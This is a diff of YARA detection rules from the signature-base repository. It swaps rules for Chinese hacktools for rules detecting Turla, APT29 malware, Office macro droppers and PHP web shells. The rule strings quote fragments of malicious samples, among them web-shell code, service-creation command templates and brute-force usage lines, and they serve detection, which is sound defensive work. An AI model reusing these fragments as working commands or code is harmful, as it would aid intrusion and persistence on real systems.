+		$s7 = "Log: Size of log(%dB) is too big, stop write." fullword ascii
+		$s8 = "%02d.%02d.%04d Log begin:" fullword ascii
+		$s9 = "\\system32\\win.com" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Churrasco : FILE
+rule SIGNATURE_BASE_MAL_Turla_Sample_May18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file churrasco.exe"
+		description = "Detects Turla samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99cb5a7a-85c1-57f5-b5b6-f0b1092e1e06"
-		date = "2015-06-13"
+		id = "5052838f-a895-55cb-abcf-813465074127"
+		date = "2018-05-03"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1664-L1681"
+		reference = "https://twitter.com/omri9741/status/991942007701598208"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L228-L250"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"
-		logic_hash = "36ca7c8d1579eeb571c182c033c312b3b231313b8950c1e24eeb3df793b004c4"
+		logic_hash = "f5bb26bc787acb89fe5a337121aabc0cd15ed3fd5cbe64ef4e7031e04dc14fb1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c49c9d601ebf16534d24d2dd1cab53fde6e03902758ef6cff86be740b720038"
+		hash2 = "77cbd7252a20f2d35db4f330b9c4b8aa7501349bc06bbcc8f40ae13d01ae7f8f"
 
 	strings:
-		$s1 = "Done, command should have ran as SYSTEM!" ascii
-		$s2 = "Running command with SYSTEM Token..." ascii
-		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii
-		$s4 = "Found SYSTEM token 0x%x" ascii
-		$s5 = "Thread not impersonating, looking for another thread..." ascii
+		$x1 = "sc %s create %s binPath= \"cmd.exe /c start %%SystemRoot%%\\%s\">>%s" fullword ascii
+		$x2 = "cmd.exe /c start %%SystemRoot%%\\%s" fullword ascii
+		$x3 = "cmd.exe /c %s\\%s -s %s:%s:%s -c \"%s %s /wait 1\">>%s" fullword ascii
+		$x4 = "Read InjectLog[%dB]********************************" fullword ascii
+		$x5 = "%s\\System32\\011fe-3420f-ff0ea-ff0ea.tmp" fullword ascii
+		$x6 = "**************************** Begin ini %s [%d]***********************************************" fullword ascii
+		$x7 = "%s -o %s -i %s -d exec2 -f %s" fullword ascii
+		$x8 = "Logon to %s failed: code %d(User:%s,Pass:%s)" fullword ascii
+		$x9 = "system32\\dxsnd32x.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
 }
-rule SIGNATURE_BASE_X64_Kiwicmd : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr20_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file KiwiCmd.exe"
+		description = "Detects Turla Linux malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "df759fd4-5d42-5dd9-81d0-ceccafcdd64d"
-		date = "2015-06-13"
+		id = "f21e7793-a7dd-5195-805d-963827b35808"
+		date = "2020-04-05"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1682-L1697"
+		reference = "https://twitter.com/Int2e_/status/1246115636331319309"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L252-L272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
-		logic_hash = "b49a70a49a67fbb57d643b38155482177f594bd1f01f5464c4f36b265aac48d8"
+		logic_hash = "d463f5a151bb0c3440d719b4c7c0d1ca34de1e0bed7fb9167ecf396607abd3ff"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
 
 	strings:
-		$s1 = "Process Ok, Memory Ok, resuming process :)" fullword wide
-		$s2 = "Kiwi Cmd no-gpo" fullword wide
-		$s3 = "KiwiAndCMD" fullword wide
+		$s1 = "/root/.hsperfdata" ascii fullword
+		$s2 = "Desc|     Filename     |  size  |state|" ascii fullword
+		$s3 = "IPv6 address %s not supported" ascii fullword
+		$s4 = "File already exist on remote filesystem !" ascii fullword
+		$s5 = "/tmp/.sync.pid" ascii fullword
+		$s6 = "'gateway' supported only on ethernet/FDDI/token ring/802.11/ATM LANE/Fibre Channel" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_Sql1433_SQL : FILE
+rule SIGNATURE_BASE_APT_MAL_Tinyturla_Sep21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file SQL.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fb4c5958-2e4e-5231-b0db-eca6bc3d823a"
-		date = "2015-06-13"
+		description = "Detects Tiny Turla backdoor DLL"
+		author = "Cisco Talos"
+		id = "19659ac7-310a-52dd-a94c-022c7add752b"
+		date = "2021-09-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1699-L1715"
+		reference = "https://blog.talosintelligence.com/2021/09/tinyturla.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla.yar#L275-L295"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "025e87deadd1c50b1021c26cb67b76b476fafd64"
-		logic_hash = "5ceecc4f345cb603a0b03180f3f09f97e5f951b5d75c469aefffe3ec62916a8f"
+		logic_hash = "ede598374bc4a8a870aa29498be4200b4a3d7b289dfcb680fb3f91108d212bca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "030cbd1a51f8583ccfc3fa38a28a5550dc1c84c05d6c0f5eb887d13dedf1da01"
 
 	strings:
-		$s0 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 31 00 34 00 33 00 33 }
-		$s1 = { 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 31 00 2C 00 34 00 2C 00 33 00 2C 00 33 }
+		$a = "Title: " fullword wide
+		$b = "Hosts" fullword wide
+		$c = "Security" fullword wide
+		$d = "TimeLong" fullword wide
+		$e = "TimeShort" fullword wide
+		$f = "MachineGuid" fullword wide
+		$g = "POST" fullword wide
+		$h = "WinHttpSetOption" fullword ascii
+		$i = "WinHttpQueryDataAvailable" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 25KB and all of them
 }
-rule SIGNATURE_BASE_Cookietools2 : FILE
+rule SIGNATURE_BASE_B374K_Back_Connect : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file CookieTools2.exe"
+		description = "Detects privilege escalation tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f227ba4b-9cad-5aac-99ab-46a8237249d4"
-		date = "2015-06-13"
+		id = "8612bda2-2576-56c0-a4ba-afbef419ab05"
+		date = "2016-08-18"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1717-L1733"
+		reference = "Internal Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_b374k_extra.yar#L8-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cb67797f229fdb92360319e01277e1345305eb82"
-		logic_hash = "8ddb8ea0bc047877d91f25375745ab8fa66af28b6b41de36e0fb16ea8284fce5"
-		score = 75
+		logic_hash = "dd89aefb6c1add44bfe2a706cd161a16f36a649f910ace16b641a7836525aa73"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c8e16f71f90bbaaef27ccaabb226b43762ca6f7e34d7d5585ae0eb2d36a4bae5"
 
 	strings:
-		$s1 = "www.gxgl.com&www.gxgl.net" fullword wide
-		$s2 = "ip.asp?IP=" fullword ascii
-		$s3 = "MSIE 5.5;" fullword ascii
-		$s4 = "SOFTWARE\\Borland\\" ascii
+		$s1 = "AddAtomACreatePro" fullword ascii
+		$s2 = "shutdow" fullword ascii
+		$s3 = "/config/i386" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them )
 }
-rule SIGNATURE_BASE_Cyclotron : FILE
+rule SIGNATURE_BASE_Office_Autoopen_Macro : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file cyclotron.sys"
+		description = "Detects an Microsoft Office file that contains the AutoOpen Macro function"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7099462b-2a72-56cd-8a50-27cd445eb9d2"
-		date = "2015-06-13"
+		id = "9774d96c-4d15-5a54-8fe2-e06372d9c4ec"
+		date = "2015-05-28"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1735-L1752"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L2-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5b63473b6dc1e5942bf07c52c31ba28f2702b246"
-		logic_hash = "f3a0edf54039479c9f4e46b20249465bbe1bca57f47afeba37965e6e3fc0127f"
-		score = 75
+		logic_hash = "23c834828e7a9ea966e5d7247881bbbf9180b8f08297e36cd36d2ba5f621c70d"
+		score = 40
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s1 = "\\Device\\IDTProt" wide
-		$s2 = "IoDeleteSymbolicLink" fullword ascii
-		$s3 = "\\??\\slIDTProt" wide
-		$s4 = "IoDeleteDevice" fullword ascii
-		$s5 = "IoCreateSymbolicLink" fullword ascii
+		hash1 = "4d00695d5011427efc33c9722c61ced2"
+		hash2 = "63f6b20cb39630b13c14823874bd3743"
+		hash3 = "66e67c2d84af85a569a04042141164e6"
+		hash4 = "a3035716fe9173703941876c2bde9d98"
+		hash5 = "7c06cab49b9332962625b16f15708345"
+		hash6 = "bfc30332b7b91572bfe712b656ea8a0c"
+		hash7 = "25285b8fe2c41bd54079c92c1b761381"
+
+	strings:
+		$s1 = "AutoOpen" ascii fullword
+		$s2 = "Macros" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3KB and all of them
+		( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x504b0304 ) and all of ( $s* ) and filesize < 300000
 }
-rule SIGNATURE_BASE_Xscan_Gui : FILE
+rule SIGNATURE_BASE_Office_As_MHTML : CVE_2012_0158 FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file xscan_gui.exe"
+		description = "Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fee11058-e75f-5d8f-8d10-06dcaed99df1"
-		date = "2015-06-13"
+		id = "21c0c3da-7295-54ad-9947-557a3180af3a"
+		date = "2015-05-28"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1754-L1770"
+		reference = "https://www.trustwave.com/Resources/SpiderLabs-Blog/Malicious-Macros-Evades-Detection-by-Using-Unusual-File-Format/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L28-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a9e900510396192eb2ba4fb7b0ef786513f9b5ab"
-		logic_hash = "366db7eb19725a0a42ce371d7bfb50a22a259f0bc0252927af626e8c1c0b9b59"
-		score = 75
+		logic_hash = "d5836a9c627e2e6833ea9e27526c76c00fc1fcf1fca8ea10777aa6f4bcc25053"
+		score = 40
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2012-0158, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8391d6992bc037a891d2e91fd474b91bd821fe6cb9cfc62d1ee9a013b18eca80"
+		hash2 = "1ff3573fe995f35e70597c75d163bdd9bed86e2238867b328ccca2a5906c4eef"
+		hash3 = "d44a76120a505a9655f0224c6660932120ef2b72fee4642bab62ede136499590"
+		hash4 = "5b8019d339907ab948a413d2be4bdb3e5fdabb320f5edc726dc60b4c70e74c84"
 
 	strings:
-		$s1 = "%s -mutex %s -host %s -index %d -config \"%s\"" fullword ascii
-		$s2 = "www.target.com" fullword ascii
-		$s3 = "%s\\scripts\\desc\\%s.desc" fullword ascii
-		$s4 = "%c Active/Maximum host thread: %d/%d, Current/Maximum thread: %d/%d, Time(s): %l" ascii
+		$s1 = "Content-Transfer-Encoding: base64" ascii fullword
+		$s2 = "Content-Type: application/x-mso" ascii fullword
+		$x1 = "QWN0aXZlTWltZQA" ascii
+		$x2 = "0M8R4KGxGuE" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		uint32be( 0 ) == 0x4d494d45 and all of ( $s* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_CN_Tools_Hscan : FILE
+rule SIGNATURE_BASE_Docm_In_PDF : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hscan.exe"
+		description = "Detects an embedded DOCM in PDF combined with OpenAction"
 		author = "Florian Roth (Nextron Systems)"
-		id = "82d9cd61-8cef-56b4-8dfe-a28edaa781b8"
-		date = "2015-06-13"
+		id = "08dfdfda-8ea5-530d-b89b-560415855080"
+		date = "2017-05-15"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1772-L1792"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
-		logic_hash = "9bc4800249bffcc4b8fc1191d600f0b9b2a7b0c1f067039c83c03671a0b4b5c5"
+		logic_hash = "045cde0e8f9e0881c2caece7d5660e165aa67b43bed2ba6d4929951497d76494"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "%s -f hosts.txt -port -ipc -pop -max 300,20 -time 10000" fullword ascii
-		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,20" fullword ascii
-		$s3 = "%s -h www.target.com -all" fullword ascii
-		$s4 = ".\\report\\%s-%s.html" fullword ascii
-		$s5 = ".\\log\\Hscan.log" fullword ascii
-		$s6 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
-		$s7 = "%s@ftpscan#FTP Account:  %s/[null]" fullword ascii
-		$s8 = ".\\conf\\mysql_pass.dic" fullword ascii
+		$a1 = /<<\/Names\[\([\w]{1,12}.docm\)/ ascii
+		$a2 = "OpenAction" ascii fullword
+		$a3 = "JavaScript" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		uint32( 0 ) == 0x46445025 and all of them
 }
-rule SIGNATURE_BASE_Goodtoolset_Pr : FILE
+rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file pr.exe"
+		description = "Auto-generated rule - file HRDG022184_certclint.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d00e1873-f2a5-5e89-9223-ead418e2667c"
-		date = "2015-06-13"
+		id = "7239a5f3-9c29-57d7-be95-946d14039353"
+		date = "2016-12-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1794-L1812"
+		reference = "https://goo.gl/WVflzO"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L10-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"
-		logic_hash = "0673bc445422f4339c9e81ff8ae8a9b2bb9bc1f107b85fe34906444a1754c43b"
+		logic_hash = "d4a06fbf875ba2dbe64abcc21fab4eea1fe1b092498a09d9a310214562c1869e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5"
 
 	strings:
-		$s1 = "-->Got WMI process Pid: %d " ascii
-		$s2 = "-->This exploit gives you a Local System shell " ascii
-		$s3 = "wmiprvse.exe" fullword ascii
-		$s4 = "Try the first %d time" fullword ascii
-		$s5 = "-->Build&&Change By p " ascii
-		$s6 = "root\\MicrosoftIISv2" fullword wide
+		$s1 = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb" fullword ascii
+		$s2 = "Repeat last find command)Replace specific text with different text" fullword wide
+		$s3 = "l\\Processor(0)\\% Processor Time" fullword wide
+		$s6 = "Self Process" fullword wide
+		$s7 = "Default Process" fullword wide
+		$s8 = "Star Polk.exe" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 4 of them )
 }
-rule SIGNATURE_BASE_Hydra_7_4_1_Hydra : FILE
+rule SIGNATURE_BASE_GRIZZLY_STEPPE_Malware_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file hydra.exe"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf692bea-091d-5be0-a012-caba01e96dde"
-		date = "2015-06-13"
+		id = "37cfba67-af85-5efe-9b07-9f1e5d9f9195"
+		date = "2016-12-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1814-L1832"
+		reference = "https://goo.gl/WVflzO"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L30-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3411d0380a1c1ebf58a454765f94d4f1dd714b5b"
-		logic_hash = "f52696cbf7355c982d1a1e0c73dce65324845c5ffc13c541e326720332b4788d"
+		logic_hash = "134a76129ef2169ac60f21541ef51a223720badfad02f0822acc7fd6d49cf7e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9acba7e5f972cdd722541a23ff314ea81ac35d5c0c758eb708fb6e2cc4f598a0"
+		hash2 = "55058d3427ce932d8efcbe54dccf97c9a8d1e85c767814e34f4b2b6a6b305641"
 
 	strings:
-		$s1 = "%d of %d target%s%scompleted, %lu valid password%s found" fullword ascii
-		$s2 = "[%d][smb] Host: %s Account: %s Error: ACCOUNT_CHANGE_PASSWORD" fullword ascii
-		$s3 = "hydra -P pass.txt target cisco-enable  (direct console access)" fullword ascii
-		$s4 = "[%d][smb] Host: %s Account: %s Error: PASSWORD EXPIRED" fullword ascii
-		$s5 = "[ERROR] SMTP LOGIN AUTH, either this auth is disabled" fullword ascii
-		$s6 = "\"/login.php:user=^USER^&pass=^PASS^&mid=123:incorrect\"" fullword ascii
+		$x1 = "GoogleCrashReport.dll" fullword ascii
+		$s1 = "CrashErrors" fullword ascii
+		$s2 = "CrashSend" fullword ascii
+		$s3 = "CrashAddData" fullword ascii
+		$s4 = "CrashCleanup" fullword ascii
+		$s5 = "CrashInit" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and $x1 ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Tools_Srss_2 : FILE
+rule SIGNATURE_BASE_PAS_TOOL_PHP_WEB_KIT_Mod : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file srss.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "3a84fa58-ccd0-5cf0-b1e0-a8f2ca04fd3f"
-		date = "2015-06-13"
+		description = "Detects PAS Tool PHP Web Kit"
+		author = "US CERT - modified by Florian Roth due to performance reasons"
+		id = "6bc75e44-7784-5e48-9bbc-052d84ebee83"
+		date = "2016-12-29"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1834-L1856"
+		reference = "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L52-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"
-		logic_hash = "e674ac7a99a67e2ebe8b4c4232e3435dd041b794f6c08a87ef7b8179127d6fc7"
+		logic_hash = "fab894d9609c1fca4a85457e6799d082dfd3eb9ca0564abc04a1a0dd07a7b546"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "used pepack!" fullword ascii
-		$s1 = "KERNEL32.dll" fullword ascii
-		$s2 = "KERNEL32.DLL" fullword ascii
-		$s3 = "LoadLibraryA" fullword ascii
-		$s4 = "GetProcAddress" fullword ascii
-		$s5 = "VirtualProtect" fullword ascii
-		$s6 = "VirtualAlloc" fullword ascii
-		$s7 = "VirtualFree" fullword ascii
-		$s8 = "ExitProcess" fullword ascii
+		$php = "<?php"
+		$base64decode1 = "='base'.("
+		$strreplace = "str_replace(\"\\n\", ''"
+		$md5 = ".substr(md5(strrev("
+		$gzinflate = "gzinflate"
+		$cookie = "_COOKIE"
+		$isset = "isset"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ( $s* )
+		uint32( 0 ) == 0x68703f3c and $php at 0 and ( filesize > 10KB and filesize < 30KB ) and #cookie == 2 and #isset == 3 and all of them
 }
-rule SIGNATURE_BASE_Dos_Ntgod : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V3 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file NtGod.exe"
+		description = "Detects PAS Tool PHP Web Kit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2f0733d-5519-5cb8-b077-0ae8472400b4"
-		date = "2015-06-13"
+		id = "dc5fa2c9-3e1e-594d-be4f-141e1f4915f1"
+		date = "2016-01-01"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1858-L1874"
+		reference = "https://github.com/wordfence/grizzly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L76-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "adefd901d6bbd8437116f0170b9c28a76d4a87bf"
-		logic_hash = "77b9204add5d25dcc36eabc07cabea2bdc67a23873c2faf7706e7fba5ed53f8b"
+		logic_hash = "21bf0afcd3f8de813ddfe41ef32e45806e9f9d7d3b08ae7ce65017c35e32a868"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "\\temp\\NtGodMode.exe" ascii
-		$s4 = "NtGodMode.exe" fullword ascii
-		$s10 = "ntgod.bat" fullword ascii
-		$s19 = "sfxcmd" fullword ascii
+		$php = "<?php $"
+		$php2 = "@assert(base64_decode($_REQUEST["
+		$s1 = "(str_replace(\"\\n\", '', '"
+		$s2 = "(strrev($" ascii
+		$s3 = "de'.'code';" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		(( uint32( 0 ) == 0x68703f3c and $php at 0 ) or $php2 ) and filesize > 8KB and filesize < 100KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Tools_Vnclink : FILE
+rule SIGNATURE_BASE_Webshell_PHP_Web_Kit_V4 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file VNCLink.exe"
+		description = "Detects PAS Tool PHP Web Kit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "270dc14c-ac8f-58c2-b4ac-c10981e20a07"
-		date = "2015-06-13"
+		id = "a5f915cd-b9c5-5cd3-b0a2-c15f6124737a"
+		date = "2016-01-01"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L1876-L1891"
+		reference = "https://github.com/wordfence/grizzly"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt29_grizzly_steppe.yar#L97-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cafb531822cbc0cfebbea864489eebba48081aa1"
-		logic_hash = "21328e2a871dfcfda47991a1f1e897efd27471420d644c09a94004cf5b0f9869"
+		logic_hash = "e2eaa0abd14f4dd08815c44797df707a08df1ea4e04ae69ba67d128a0fe4eff5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "C:\\temp\\vncviewer4.log" fullword ascii
-		$s2 = "[BL4CK] Patched by redsand || http://blacksecurity.org" fullword ascii
-		$s3 = "fake release extendedVkey 0x%x, keysym 0x%x" fullword ascii
+		$php = "<?php $"
+		$s1 = "(StR_ReplAcE(\"\\n\",'',"
+		$s2 = ";if(PHP_VERSION<'5'){" ascii
+		$s3 = "=SuBstr_rePlACe(" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 580KB and 2 of them
+		uint32( 0 ) == 0x68703f3c and $php at 0 and filesize > 8KB and filesize < 100KB and 2 of ( $s* )
 }
-rule SIGNATURE_BASE_Tools_Ntcmd : FILE
+rule SIGNATURE_BASE_APT_APT29_Wellmess_Dotnet_Unique_Strings : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file NTCmd.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "db3f28d6-dfe8-5c79-a11b-e31701e250d7"
-		date = "2015-06-13"
+		description = "Rule to detect WellMess .NET samples based on unique strings and function/variable names"
+		author = "NCSC"
